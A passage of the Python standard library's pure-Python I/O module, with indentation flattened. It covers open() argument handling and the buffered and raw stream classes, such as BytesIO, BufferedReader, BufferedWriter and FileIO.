't' is appended to the mode argument), the contents of the file are
returned as strings, the bytes having been first decoded using a
platform-dependent encoding or using the specified encoding if given.
'U' mode is deprecated and will raise an exception in future versions
of Python. It has no effect in Python 3. Use newline to control
universal newlines mode.
buffering is an optional integer used to set the buffering policy.
Pass 0 to switch buffering off (only allowed in binary mode), 1 to select
line buffering (only usable in text mode), and an integer > 1 to indicate
the size of a fixed-size chunk buffer. When no buffering argument is
given, the default buffering policy works as follows:
* Binary files are buffered in fixed-size chunks; the size of the buffer
is chosen using a heuristic trying to determine the underlying device's
"block size" and falling back on `io.DEFAULT_BUFFER_SIZE`.
On many systems, the buffer will typically be 4096 or 8192 bytes long.
* "Interactive" text files (files for which isatty() returns True)
use line buffering. Other text files use the policy described above
for binary files.
encoding is the str name of the encoding used to decode or encode the
file. This should only be used in text mode. The default encoding is
platform dependent, but any encoding supported by Python can be
passed. See the codecs module for the list of supported encodings.
errors is an optional string that specifies how encoding errors are to
be handled---this argument should not be used in binary mode. Pass
'strict' to raise a ValueError exception if there is an encoding error
(the default of None has the same effect), or pass 'ignore' to ignore
errors. (Note that ignoring encoding errors can lead to data loss.)
See the documentation for codecs.register for a list of the permitted
encoding error strings.
newline is a string controlling how universal newlines works (it only
applies to text mode). It can be None, '', '\n', '\r', and '\r\n'. It works
as follows:
* On input, if newline is None, universal newlines mode is
enabled. Lines in the input can end in '\n', '\r', or '\r\n', and
these are translated into '\n' before being returned to the
caller. If it is '', universal newline mode is enabled, but line
endings are returned to the caller untranslated. If it has any of
the other legal values, input lines are only terminated by the given
string, and the line ending is returned to the caller untranslated.
* On output, if newline is None, any '\n' characters written are
translated to the system default line separator, os.linesep. If
newline is '', no translation takes place. If newline is any of the
other legal values, any '\n' characters written are translated to
the given string.
closedfd is a bool. If closefd is False, the underlying file descriptor will
be kept open when the file is closed. This does not work when a file name is
given and must be True in that case.
The newly created file is non-inheritable.
A custom opener can be used by passing a callable as *opener*. The
underlying file descriptor for the file object is then obtained by calling
*opener* with (*file*, *flags*). *opener* must return an open file
descriptor (passing os.open as *opener* results in functionality similar to
passing None).
open() returns a file object whose type depends on the mode, and
through which the standard file operations such as reading and writing
are performed. When open() is used to open a file in a text mode ('w',
'r', 'wt', 'rt', etc.), it returns a TextIOWrapper. When used to open
a file in a binary mode, the returned class varies: in read binary
mode, it returns a BufferedReader; in write binary and append binary
modes, it returns a BufferedWriter, and in read/write mode, it returns
a BufferedRandom.
It is also possible to use a string or bytearray as a file for both
reading and writing. For strings StringIO can be used like a file
opened in a text mode, and for bytes a BytesIO can be used like a file
opened in a binary mode.
"""
if not isinstance(file, int):
file = os.fspath(file)
if not isinstance(file, (str, bytes, int)):
raise TypeError("invalid file: %r" % file)
if not isinstance(mode, str):
raise TypeError("invalid mode: %r" % mode)
if not isinstance(buffering, int):
raise TypeError("invalid buffering: %r" % buffering)
if encoding is not None and not isinstance(encoding, str):
raise TypeError("invalid encoding: %r" % encoding)
if errors is not None and not isinstance(errors, str):
raise TypeError("invalid errors: %r" % errors)
modes = set(mode)
if modes - set("axrwb+tU") or len(mode) > len(modes):
raise ValueError("invalid mode: %r" % mode)
creating = "x" in modes
reading = "r" in modes
writing = "w" in modes
appending = "a" in modes
updating = "+" in modes
text = "t" in modes
binary = "b" in modes
if "U" in modes:
if creating or writing or appending or updating:
raise ValueError("mode U cannot be combined with 'x', 'w', 'a', or '+'")
import warnings
warnings.warn("'U' mode is deprecated",
DeprecationWarning, 2)
reading = True
if text and binary:
raise ValueError("can't have text and binary mode at once")
if creating + reading + writing + appending > 1:
raise ValueError("can't have read/write/append mode at once")
if not (creating or reading or writing or appending):
raise ValueError("must have exactly one of read/write/append mode")
if binary and encoding is not None:
raise ValueError("binary mode doesn't take an encoding argument")
if binary and errors is not None:
raise ValueError("binary mode doesn't take an errors argument")
if binary and newline is not None:
raise ValueError("binary mode doesn't take a newline argument")
if binary and buffering == 1:
import warnings
warnings.warn("line buffering (buffering=1) isn't supported in binary "
"mode, the default buffer size will be used",
RuntimeWarning, 2)
raw = FileIO(file,
(creating and "x" or "") +
(reading and "r" or "") +
(writing and "w" or "") +
(appending and "a" or "") +
(updating and "+" or ""),
closefd, opener=opener)
result = raw
try:
line_buffering = False
if buffering == 1 or buffering < 0 and raw.isatty():
buffering = -1
line_buffering = True
if buffering < 0:
buffering = DEFAULT_BUFFER_SIZE
try:
bs = os.fstat(raw.fileno()).st_blksize
except (OSError, AttributeError):
pass
else:
if bs > 1:
buffering = bs
if buffering < 0:
raise ValueError("invalid buffering size")
if buffering == 0:
if binary:
return result
raise ValueError("can't have unbuffered text I/O")
if updating:
buffer = BufferedRandom(raw, buffering)
elif creating or writing or appending:
buffer = BufferedWriter(raw, buffering)
elif reading:
buffer = BufferedReader(raw, buffering)
else:
raise ValueError("unknown mode: %r" % mode)
result = buffer
if binary:
return result
text = TextIOWrapper(buffer, encoding, errors, newline, line_buffering)
result = text
text.mode = mode
return result
except:
result.close()
raise
# Define a default pure-Python implementation for open_code()
# that does not allow hooks. Warn on first use. Defined for tests.
def _open_code_with_warning(path):
"""Opens the provided file with mode ``'rb'``. This function
should be used when the intent is to treat the contents as
executable code.
``path`` should be an absolute path.
When supported by the runtime, this function can be hooked
in order to allow embedders more control over code files.
This functionality is not supported on the current runtime.
"""
import warnings
warnings.warn("_pyio.open_code() may not be using hooks",
RuntimeWarning, 2)
return open(path, "rb")
try:
open_code = io.open_code
except AttributeError:
open_code = _open_code_with_warning
class DocDescriptor:
"""Helper for builtins.open.__doc__
"""
def __get__(self, obj, typ=None):
return (
"open(file, mode='r', buffering=-1, encoding=None, "
"errors=None, newline=None, closefd=True)\n\n" +
open.__doc__)
class OpenWrapper:
"""Wrapper for builtins.open
Trick so that open won't become a bound method when stored
as a class variable (as dbm.dumb does).
See initstdio() in Python/pylifecycle.c.
"""
__doc__ = DocDescriptor()
def __new__(cls, *args, **kwargs):
return open(*args, **kwargs)
# In normal operation, both `UnsupportedOperation`s should be bound to the
# same object.
try:
UnsupportedOperation = io.UnsupportedOperation
except AttributeError:
class UnsupportedOperation(OSError, ValueError):
pass
class IOBase(metaclass=abc.ABCMeta):
"""The abstract base class for all I/O classes, acting on streams of
bytes. There is no public constructor.
This class provides dummy implementations for many methods that
derived classes can override selectively; the default implementations
represent a file that cannot be read, written or seeked.
Even though IOBase does not declare read or write because
their signatures will vary, implementations and clients should
consider those methods part of the interface. Also, implementations
may raise UnsupportedOperation when operations they do not support are
called.
The basic type used for binary data read from or written to a file is
bytes. Other bytes-like objects are accepted as method arguments too.
Text I/O classes work with str data.
Note that calling any method (even inquiries) on a closed stream is
undefined. Implementations may raise OSError in this case.
IOBase (and its subclasses) support the iterator protocol, meaning
that an IOBase object can be iterated over yielding the lines in a
stream.
IOBase also supports the :keyword:`with` statement. In this example,
fp is closed after the suite of the with statement is complete:
with open('spam.txt', 'r') as fp:
fp.write('Spam and eggs!')
"""
### Internal ###
def _unsupported(self, name):
"""Internal: raise an OSError exception for unsupported operations."""
raise UnsupportedOperation("%s.%s() not supported" %
(self.__class__.__name__, name))
### Positioning ###
def seek(self, pos, whence=0):
"""Change stream position.
Change the stream position to byte offset pos. Argument pos is
interpreted relative to the position indicated by whence. Values
for whence are ints:
* 0 -- start of stream (the default); offset should be zero or positive
* 1 -- current stream position; offset may be negative
* 2 -- end of stream; offset is usually negative
Some operating systems / file systems could provide additional values.
Return an int indicating the new absolute position.
"""
self._unsupported("seek")
def tell(self):
"""Return an int indicating the current stream position."""
return self.seek(0, 1)
def truncate(self, pos=None):
"""Truncate file to size bytes.
Size defaults to the current IO position as reported by tell(). Return
the new size.
"""
self._unsupported("truncate")
### Flush and close ###
def flush(self):
"""Flush write buffers, if applicable.
This is not implemented for read-only and non-blocking streams.
"""
self._checkClosed()
# XXX Should this return the number of bytes written???
__closed = False
def close(self):
"""Flush and close the IO object.
This method has no effect if the file is already closed.
"""
if not self.__closed:
try:
self.flush()
finally:
self.__closed = True
def __del__(self):
"""Destructor. Calls close()."""
try:
closed = self.closed
except AttributeError:
# If getting closed fails, then the object is probably
# in an unusable state, so ignore.
return
if closed:
return
if _IOBASE_EMITS_UNRAISABLE:
self.close()
else:
# The try/except block is in case this is called at program
# exit time, when it's possible that globals have already been
# deleted, and then the close() call might fail. Since
# there's nothing we can do about such failures and they annoy
# the end users, we suppress the traceback.
try:
self.close()
except:
pass
### Inquiries ###
def seekable(self):
"""Return a bool indicating whether object supports random access.
If False, seek(), tell() and truncate() will raise OSError.
This method may need to do a test seek().
"""
return False
def _checkSeekable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not seekable
"""
if not self.seekable():
raise UnsupportedOperation("File or stream is not seekable."
if msg is None else msg)
def readable(self):
"""Return a bool indicating whether object was opened for reading.
If False, read() will raise OSError.
"""
return False
def _checkReadable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not readable
"""
if not self.readable():
raise UnsupportedOperation("File or stream is not readable."
if msg is None else msg)
def writable(self):
"""Return a bool indicating whether object was opened for writing.
If False, write() and truncate() will raise OSError.
"""
return False
def _checkWritable(self, msg=None):
"""Internal: raise UnsupportedOperation if file is not writable
"""
if not self.writable():
raise UnsupportedOperation("File or stream is not writable."
if msg is None else msg)
@property
def closed(self):
"""closed: bool. True iff the file has been closed.
For backwards compatibility, this is a property, not a predicate.
"""
return self.__closed
def _checkClosed(self, msg=None):
"""Internal: raise a ValueError if file is closed
"""
if self.closed:
raise ValueError("I/O operation on closed file."
if msg is None else msg)
### Context manager ###
def __enter__(self): # That's a forward reference
"""Context management protocol. Returns self (an instance of IOBase)."""
self._checkClosed()
return self
def __exit__(self, *args):
"""Context management protocol. Calls close()"""
self.close()
### Lower-level APIs ###
# XXX Should these be present even if unimplemented?
def fileno(self):
"""Returns underlying file descriptor (an int) if one exists.
An OSError is raised if the IO object does not use a file descriptor.
"""
self._unsupported("fileno")
def isatty(self):
"""Return a bool indicating whether this is an 'interactive' stream.
Return False if it can't be determined.
"""
self._checkClosed()
return False
### Readline[s] and writelines ###
def readline(self, size=-1):
r"""Read and return a line of bytes from the stream.
If size is specified, at most size bytes will be read.
Size should be an int.
The line terminator is always b'\n' for binary files; for text
files, the newlines argument to open can be used to select the line
terminator(s) recognized.
"""
# For backwards compatibility, a (slowish) readline().
if hasattr(self, "peek"):
def nreadahead():
readahead = self.peek(1)
if not readahead:
return 1
n = (readahead.find(b"\n") + 1) or len(readahead)
if size >= 0:
n = min(n, size)
return n
else:
def nreadahead():
return 1
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
res = bytearray()
while size < 0 or len(res) < size:
b = self.read(nreadahead())
if not b:
break
res += b
if res.endswith(b"\n"):
break
return bytes(res)
def __iter__(self):
self._checkClosed()
return self
def __next__(self):
line = self.readline()
if not line:
raise StopIteration
return line
def readlines(self, hint=None):
"""Return a list of lines from the stream.
hint can be specified to control the number of lines read: no more
lines will be read if the total size (in bytes/characters) of all
lines so far exceeds hint.
"""
if hint is None or hint <= 0:
return list(self)
n = 0
lines = []
for line in self:
lines.append(line)
n += len(line)
if n >= hint:
break
return lines
def writelines(self, lines):
"""Write a list of lines to the stream.
Line separators are not added, so it is usual for each of the lines
provided to have a line separator at the end.
"""
self._checkClosed()
for line in lines:
self.write(line)
io.IOBase.register(IOBase)
class RawIOBase(IOBase):
"""Base class for raw binary I/O."""
# The read() method is implemented by calling readinto(); derived
# classes that want to support read() only need to implement
# readinto() as a primitive operation. In general, readinto() can be
# more efficient than read().
# (It would be tempting to also provide an implementation of
# readinto() in terms of read(), in case the latter is a more suitable
# primitive operation, but that would lead to nasty recursion in case
# a subclass doesn't implement either.)
def read(self, size=-1):
"""Read and return up to size bytes, where size is an int.
Returns an empty bytes object on EOF, or None if the object is
set not to block and has no data to read.
"""
if size is None:
size = -1
if size < 0:
return self.readall()
b = bytearray(size.__index__())
n = self.readinto(b)
if n is None:
return None
del b[n:]
return bytes(b)
def readall(self):
"""Read until EOF, using multiple read() call."""
res = bytearray()
while True:
data = self.read(DEFAULT_BUFFER_SIZE)
if not data:
break
res += data
if res:
return bytes(res)
else:
# b'' or None
return data
def readinto(self, b):
"""Read bytes into a pre-allocated bytes-like object b.
Returns an int representing the number of bytes read (0 for EOF), or
None if the object is set not to block and has no data to read.
"""
self._unsupported("readinto")
def write(self, b):
"""Write the given buffer to the IO stream.
Returns the number of bytes written, which may be less than the
length of b in bytes.
"""
self._unsupported("write")
io.RawIOBase.register(RawIOBase)
from _io import FileIO
RawIOBase.register(FileIO)
class BufferedIOBase(IOBase):
"""Base class for buffered IO objects.
The main difference with RawIOBase is that the read() method
supports omitting the size argument, and does not have a default
implementation that defers to readinto().
In addition, read(), readinto() and write() may raise
BlockingIOError if the underlying raw stream is in non-blocking
mode and not ready; unlike their raw counterparts, they will never
return None.
A typical implementation should not inherit from a RawIOBase
implementation, but wrap one.
"""
def read(self, size=-1):
"""Read and return up to size bytes, where size is an int.
If the argument is omitted, None, or negative, reads and
returns all data until EOF.
If the argument is positive, and the underlying raw stream is
not 'interactive', multiple raw reads may be issued to satisfy
the byte count (unless EOF is reached first). But for
interactive raw streams (XXX and for pipes?), at most one raw
read will be issued, and a short result does not imply that
EOF is imminent.
Returns an empty bytes array on EOF.
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
self._unsupported("read")
def read1(self, size=-1):
"""Read up to size bytes with at most one read() system call,
where size is an int.
"""
self._unsupported("read1")
def readinto(self, b):
"""Read bytes into a pre-allocated bytes-like object b.
Like read(), this may issue multiple reads to the underlying raw
stream, unless the latter is 'interactive'.
Returns an int representing the number of bytes read (0 for EOF).
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
return self._readinto(b, read1=False)
def readinto1(self, b):
"""Read bytes into buffer *b*, using at most one system call
Returns an int representing the number of bytes read (0 for EOF).
Raises BlockingIOError if the underlying raw stream has no
data at the moment.
"""
return self._readinto(b, read1=True)
def _readinto(self, b, read1):
if not isinstance(b, memoryview):
b = memoryview(b)
b = b.cast('B')
if read1:
data = self.read1(len(b))
else:
data = self.read(len(b))
n = len(data)
b[:n] = data
return n
def write(self, b):
"""Write the given bytes buffer to the IO stream.
Return the number of bytes written, which is always the length of b
in bytes.
Raises BlockingIOError if the buffer is full and the
underlying raw stream cannot accept more data at the moment.
"""
self._unsupported("write")
def detach(self):
"""
Separate the underlying raw stream from the buffer and return it.
After the raw stream has been detached, the buffer is in an unusable
state.
"""
self._unsupported("detach")
io.BufferedIOBase.register(BufferedIOBase)
class _BufferedIOMixin(BufferedIOBase):
"""A mixin implementation of BufferedIOBase with an underlying raw stream.
This passes most requests on to the underlying raw stream. It
does *not* provide implementations of read(), readinto() or
write().
"""
def __init__(self, raw):
self._raw = raw
### Positioning ###
def seek(self, pos, whence=0):
new_position = self.raw.seek(pos, whence)
if new_position < 0:
raise OSError("seek() returned an invalid position")
return new_position
def tell(self):
pos = self.raw.tell()
if pos < 0:
raise OSError("tell() returned an invalid position")
return pos
def truncate(self, pos=None):
# Flush the stream. We're mixing buffered I/O with lower-level I/O,
# and a flush may be necessary to synch both views of the current
# file state.
self.flush()
if pos is None:
pos = self.tell()
# XXX: Should seek() be used, instead of passing the position
# XXX directly to truncate?
return self.raw.truncate(pos)
### Flush and close ###
def flush(self):
if self.closed:
raise ValueError("flush on closed file")
self.raw.flush()
def close(self):
if self.raw is not None and not self.closed:
try:
# may raise BlockingIOError or BrokenPipeError etc
self.flush()
finally:
self.raw.close()
def detach(self):
if self.raw is None:
raise ValueError("raw stream already detached")
self.flush()
raw = self._raw
self._raw = None
return raw
### Inquiries ###
def seekable(self):
return self.raw.seekable()
@property
def raw(self):
return self._raw
@property
def closed(self):
return self.raw.closed
@property
def name(self):
return self.raw.name
@property
def mode(self):
return self.raw.mode
def __getstate__(self):
raise TypeError(f"cannot pickle {self.__class__.__name__!r} object")
def __repr__(self):
modname = self.__class__.__module__
clsname = self.__class__.__qualname__
try:
name = self.name
except AttributeError:
return "<{}.{}>".format(modname, clsname)
else:
return "<{}.{} name={!r}>".format(modname, clsname, name)
### Lower-level APIs ###
def fileno(self):
return self.raw.fileno()
def isatty(self):
return self.raw.isatty()
class BytesIO(BufferedIOBase):
"""Buffered I/O implementation using an in-memory bytes buffer."""
# Initialize _buffer as soon as possible since it's used by __del__()
# which calls close()
_buffer = None
def __init__(self, initial_bytes=None):
buf = bytearray()
if initial_bytes is not None:
buf += initial_bytes
self._buffer = buf
self._pos = 0
def __getstate__(self):
if self.closed:
raise ValueError("__getstate__ on closed file")
return self.__dict__.copy()
def getvalue(self):
"""Return the bytes value (contents) of the buffer
"""
if self.closed:
raise ValueError("getvalue on closed file")
return bytes(self._buffer)
def getbuffer(self):
"""Return a readable and writable view of the buffer.
"""
if self.closed:
raise ValueError("getbuffer on closed file")
return memoryview(self._buffer)
def close(self):
if self._buffer is not None:
self._buffer.clear()
super().close()
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
else:
try:
size_index = size.__index__
except AttributeError:
raise TypeError(f"{size!r} is not an integer")
else:
size = size_index()
if size < 0:
size = len(self._buffer)
if len(self._buffer) <= self._pos:
return b""
newpos = min(len(self._buffer), self._pos + size)
b = self._buffer[self._pos : newpos]
self._pos = newpos
return bytes(b)
def read1(self, size=-1):
"""This is the same as read.
"""
return self.read(size)
def write(self, b):
if self.closed:
raise ValueError("write to closed file")
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with memoryview(b) as view:
n = view.nbytes # Size of any bytes-like object
if n == 0:
return 0
pos = self._pos
if pos > len(self._buffer):
# Inserts null bytes between the current end of the file
# and the new write position.
padding = b'\x00' * (pos - len(self._buffer))
self._buffer += padding
self._buffer[pos:pos + n] = b
self._pos += n
return n
def seek(self, pos, whence=0):
if self.closed:
raise ValueError("seek on closed file")
try:
pos_index = pos.__index__
except AttributeError:
raise TypeError(f"{pos!r} is not an integer")
else:
pos = pos_index()
if whence == 0:
if pos < 0:
raise ValueError("negative seek position %r" % (pos,))
self._pos = pos
elif whence == 1:
self._pos = max(0, self._pos + pos)
elif whence == 2:
self._pos = max(0, len(self._buffer) + pos)
else:
raise ValueError("unsupported whence value")
return self._pos
def tell(self):
if self.closed:
raise ValueError("tell on closed file")
return self._pos
def truncate(self, pos=None):
if self.closed:
raise ValueError("truncate on closed file")
if pos is None:
pos = self._pos
else:
try:
pos_index = pos.__index__
except AttributeError:
raise TypeError(f"{pos!r} is not an integer")
else:
pos = pos_index()
if pos < 0:
raise ValueError("negative truncate position %r" % (pos,))
del self._buffer[pos:]
return pos
def readable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
def writable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
def seekable(self):
if self.closed:
raise ValueError("I/O operation on closed file.")
return True
class BufferedReader(_BufferedIOMixin):
"""BufferedReader(raw[, buffer_size])
A buffer for a readable, sequential BaseRawIO object.
The constructor creates a BufferedReader for the given readable raw
stream and buffer_size. If buffer_size is omitted, DEFAULT_BUFFER_SIZE
is used.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
"""Create a new buffered reader using the given readable raw IO object.
"""
if not raw.readable():
raise OSError('"raw" argument must be readable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
self.buffer_size = buffer_size
self._reset_read_buf()
self._read_lock = Lock()
def readable(self):
return self.raw.readable()
def _reset_read_buf(self):
self._read_buf = b""
self._read_pos = 0
def read(self, size=None):
"""Read size bytes.
Returns exactly size bytes of data unless the underlying raw IO
stream reaches EOF or if the call would block in non-blocking
mode. If size is negative, read until EOF or until read() would
block.
"""
if size is not None and size < -1:
raise ValueError("invalid number of bytes to read")
with self._read_lock:
return self._read_unlocked(size)
def _read_unlocked(self, n=None):
nodata_val = b""
empty_values = (b"", None)
buf = self._read_buf
pos = self._read_pos
# Special case for when the number of bytes to read is unspecified.
if n is None or n == -1:
self._reset_read_buf()
if hasattr(self.raw, 'readall'):
chunk = self.raw.readall()
if chunk is None:
return buf[pos:] or None
else:
return buf[pos:] + chunk
chunks = [buf[pos:]] # Strip the consumed bytes.
current_size = 0
while True:
# Read until EOF or until read() would block.
chunk = self.raw.read()
if chunk in empty_values:
nodata_val = chunk
break
current_size += len(chunk)
chunks.append(chunk)
return b"".join(chunks) or nodata_val
# The number of bytes to read is specified, return at most n bytes.
avail = len(buf) - pos # Length of the available buffered data.
if n <= avail:
# Fast path: the data to read is fully buffered.
self._read_pos += n
return buf[pos:pos+n]
# Slow path: read from the stream until enough bytes are read,
# or until an EOF occurs or until read() would block.
chunks = [buf[pos:]]
wanted = max(self.buffer_size, n)
while avail < n:
chunk = self.raw.read(wanted)
if chunk in empty_values:
nodata_val = chunk
break
avail += len(chunk)
chunks.append(chunk)
# n is more than avail only when an EOF occurred or when
# read() would have blocked.
n = min(n, avail)
out = b"".join(chunks)
self._read_buf = out[n:] # Save the extra data in the buffer.
self._read_pos = 0
return out[:n] if out else nodata_val
def peek(self, size=0):
"""Returns buffered bytes without advancing the position.
The argument indicates a desired minimal number of bytes; we
do at most one raw read to satisfy it. We never return more
than self.buffer_size.
"""
with self._read_lock:
return self._peek_unlocked(size)
def _peek_unlocked(self, n=0):
want = min(n, self.buffer_size)
have = len(self._read_buf) - self._read_pos
if have < want or have <= 0:
to_read = self.buffer_size - have
current = self.raw.read(to_read)
if current:
self._read_buf = self._read_buf[self._read_pos:] + current
self._read_pos = 0
return self._read_buf[self._read_pos:]
def read1(self, size=-1):
"""Reads up to size bytes, with at most one read() system call."""
# Returns up to size bytes. If at least one byte is buffered, we
# only return buffered bytes. Otherwise, we do one raw read.
if size < 0:
size = self.buffer_size
if size == 0:
return b""
with self._read_lock:
self._peek_unlocked(1)
return self._read_unlocked(
min(size, len(self._read_buf) - self._read_pos))
# Implementing readinto() and readinto1() is not strictly necessary (we
# could rely on the base class that provides an implementation in terms of
# read() and read1()). We do it anyway to keep the _pyio implementation
# similar to the io implementation (which implements the methods for
# performance reasons).
def _readinto(self, buf, read1):
"""Read data into *buf* with at most one system call."""
# Need to create a memoryview object of type 'b', otherwise
# we may not be able to assign bytes to it, and slicing it
# would create a new object.
if not isinstance(buf, memoryview):
buf = memoryview(buf)
if buf.nbytes == 0:
return 0
buf = buf.cast('B')
written = 0
with self._read_lock:
while written < len(buf):
# First try to read from internal buffer
avail = min(len(self._read_buf) - self._read_pos, len(buf))
if avail:
buf[written:written+avail] = \
self._read_buf[self._read_pos:self._read_pos+avail]
self._read_pos += avail
written += avail
if written == len(buf):
break
# If remaining space in callers buffer is larger than
# internal buffer, read directly into callers buffer
if len(buf) - written > self.buffer_size:
n = self.raw.readinto(buf[written:])
if not n:
break # eof
written += n
# Otherwise refill internal buffer - unless we're
# in read1 mode and already got some data
elif not (read1 and written):
if not self._peek_unlocked(1):
break # eof
# In readinto1 mode, return as soon as we have some data
if read1 and written:
break
return written
def tell(self):
return _BufferedIOMixin.tell(self) - len(self._read_buf) + self._read_pos
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
with self._read_lock:
if whence == 1:
pos -= len(self._read_buf) - self._read_pos
pos = _BufferedIOMixin.seek(self, pos, whence)
self._reset_read_buf()
return pos
class BufferedWriter(_BufferedIOMixin):
"""A buffer for a writeable sequential RawIO object.
The constructor creates a BufferedWriter for the given writeable raw
stream. If the buffer_size is not given, it defaults to
DEFAULT_BUFFER_SIZE.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
if not raw.writable():
raise OSError('"raw" argument must be writable.')
_BufferedIOMixin.__init__(self, raw)
if buffer_size <= 0:
raise ValueError("invalid buffer size")
self.buffer_size = buffer_size
self._write_buf = bytearray()
self._write_lock = Lock()
def writable(self):
return self.raw.writable()
def write(self, b):
if isinstance(b, str):
raise TypeError("can't write str to binary stream")
with self._write_lock:
if self.closed:
raise ValueError("write to closed file")
# XXX we can implement some more tricks to try and avoid
# partial writes
if len(self._write_buf) > self.buffer_size:
# We're full, so let's pre-flush the buffer. (This may
# raise BlockingIOError with characters_written == 0.)
self._flush_unlocked()
before = len(self._write_buf)
self._write_buf.extend(b)
written = len(self._write_buf) - before
if len(self._write_buf) > self.buffer_size:
try:
self._flush_unlocked()
except BlockingIOError as e:
if len(self._write_buf) > self.buffer_size:
# We've hit the buffer_size. We have to accept a partial
# write and cut back our buffer.
overage = len(self._write_buf) - self.buffer_size
written -= overage
self._write_buf = self._write_buf[:self.buffer_size]
raise BlockingIOError(e.errno, e.strerror, written)
return written
def truncate(self, pos=None):
with self._write_lock:
self._flush_unlocked()
if pos is None:
pos = self.raw.tell()
return self.raw.truncate(pos)
def flush(self):
with self._write_lock:
self._flush_unlocked()
def _flush_unlocked(self):
if self.closed:
raise ValueError("flush on closed file")
while self._write_buf:
try:
n = self.raw.write(self._write_buf)
except BlockingIOError:
raise RuntimeError("self.raw should implement RawIOBase: it "
"should not raise BlockingIOError")
if n is None:
raise BlockingIOError(
errno.EAGAIN,
"write could not complete without blocking", 0)
if n > len(self._write_buf) or n < 0:
raise OSError("write() returned incorrect number of bytes")
del self._write_buf[:n]
def tell(self):
return _BufferedIOMixin.tell(self) + len(self._write_buf)
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
with self._write_lock:
self._flush_unlocked()
return _BufferedIOMixin.seek(self, pos, whence)
def close(self):
with self._write_lock:
if self.raw is None or self.closed:
return
# We have to release the lock and call self.flush() (which will
# probably just re-take the lock) in case flush has been overridden in
# a subclass or the user set self.flush to something. This is the same
# behavior as the C implementation.
try:
# may raise BlockingIOError or BrokenPipeError etc
self.flush()
finally:
with self._write_lock:
self.raw.close()
class BufferedRWPair(BufferedIOBase):
"""A buffered reader and writer object together.
A buffered reader object and buffered writer object put together to
form a sequential IO object that can read and write. This is typically
used with a socket or two-way pipe.
reader and writer are RawIOBase objects that are readable and
writeable respectively. If the buffer_size is omitted it defaults to
DEFAULT_BUFFER_SIZE.
"""
# XXX The usefulness of this (compared to having two separate IO
# objects) is questionable.
def __init__(self, reader, writer, buffer_size=DEFAULT_BUFFER_SIZE):
"""Constructor.
The arguments are two RawIO instances.
"""
if not reader.readable():
raise OSError('"reader" argument must be readable.')
if not writer.writable():
raise OSError('"writer" argument must be writable.')
self.reader = BufferedReader(reader, buffer_size)
self.writer = BufferedWriter(writer, buffer_size)
def read(self, size=-1):
if size is None:
size = -1
return self.reader.read(size)
def readinto(self, b):
return self.reader.readinto(b)
def write(self, b):
return self.writer.write(b)
def peek(self, size=0):
return self.reader.peek(size)
def read1(self, size=-1):
return self.reader.read1(size)
def readinto1(self, b):
return self.reader.readinto1(b)
def readable(self):
return self.reader.readable()
def writable(self):
return self.writer.writable()
def flush(self):
return self.writer.flush()
def close(self):
try:
self.writer.close()
finally:
self.reader.close()
def isatty(self):
return self.reader.isatty() or self.writer.isatty()
@property
def closed(self):
return self.writer.closed
class BufferedRandom(BufferedWriter, BufferedReader):
"""A buffered interface to random access streams.
The constructor creates a reader and writer for a seekable stream,
raw, given in the first argument. If the buffer_size is omitted it
defaults to DEFAULT_BUFFER_SIZE.
"""
def __init__(self, raw, buffer_size=DEFAULT_BUFFER_SIZE):
raw._checkSeekable()
BufferedReader.__init__(self, raw, buffer_size)
BufferedWriter.__init__(self, raw, buffer_size)
def seek(self, pos, whence=0):
if whence not in valid_seek_flags:
raise ValueError("invalid whence value")
self.flush()
if self._read_buf:
# Undo read ahead.
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
# First do the raw seek, then empty the read buffer, so that
# if the raw seek fails, we don't lose buffered data forever.
pos = self.raw.seek(pos, whence)
with self._read_lock:
self._reset_read_buf()
if pos < 0:
raise OSError("seek() returned invalid position")
return pos
def tell(self):
if self._write_buf:
return BufferedWriter.tell(self)
else:
return BufferedReader.tell(self)
def truncate(self, pos=None):
if pos is None:
pos = self.tell()
# Use seek to flush the read buffer.
return BufferedWriter.truncate(self, pos)
def read(self, size=None):
if size is None:
size = -1
self.flush()
return BufferedReader.read(self, size)
def readinto(self, b):
self.flush()
return BufferedReader.readinto(self, b)
def peek(self, size=0):
self.flush()
return BufferedReader.peek(self, size)
def read1(self, size=-1):
self.flush()
return BufferedReader.read1(self, size)
def readinto1(self, b):
self.flush()
return BufferedReader.readinto1(self, b)
def write(self, b):
if self._read_buf:
# Undo readahead
with self._read_lock:
self.raw.seek(self._read_pos - len(self._read_buf), 1)
self._reset_read_buf()
return BufferedWriter.write(self, b)
class FileIO(RawIOBase):
_fd = -1
_created = False
_readable = False
_writable = False
_appending = False
_seekable = None
_closefd = True
def __init__(self, file, mode='r', closefd=True, opener=None):
"""Open a file. The mode can be 'r' (default), 'w', 'x' or 'a' for reading,
writing, exclusive creation or appending. The file will be created if it
doesn't exist when opened for writing or appending; it will be truncated
when opened for writing. A FileExistsError will be raised if it already
exists when opened for creating. Opening a file for creating implies
writing so this mode behaves in a similar way to 'w'. Add a '+' to the mode
to allow simultaneous reading and writing. A custom opener can be used by
passing a callable as *opener*. The underlying file descriptor for the file
object is then obtained by calling opener with (*name*, *flags*).
*opener* must return an open file descriptor (passing os.open as *opener*
results in functionality similar to passing None).
"""
if self._fd >= 0:
# Have to close the existing file first.
try:
if self._closefd:
os.close(self._fd)
finally:
self._fd = -1
if isinstance(file, float):
raise TypeError('integer argument expected, got float')
if isinstance(file, int):
fd = file
if fd < 0:
raise ValueError('negative file descriptor')
else:
fd = -1
if not isinstance(mode, str):
raise TypeError('invalid mode: %s' % (mode,))
if not set(mode) <= set('xrwab+'):
raise ValueError('invalid mode: %s' % (mode,))
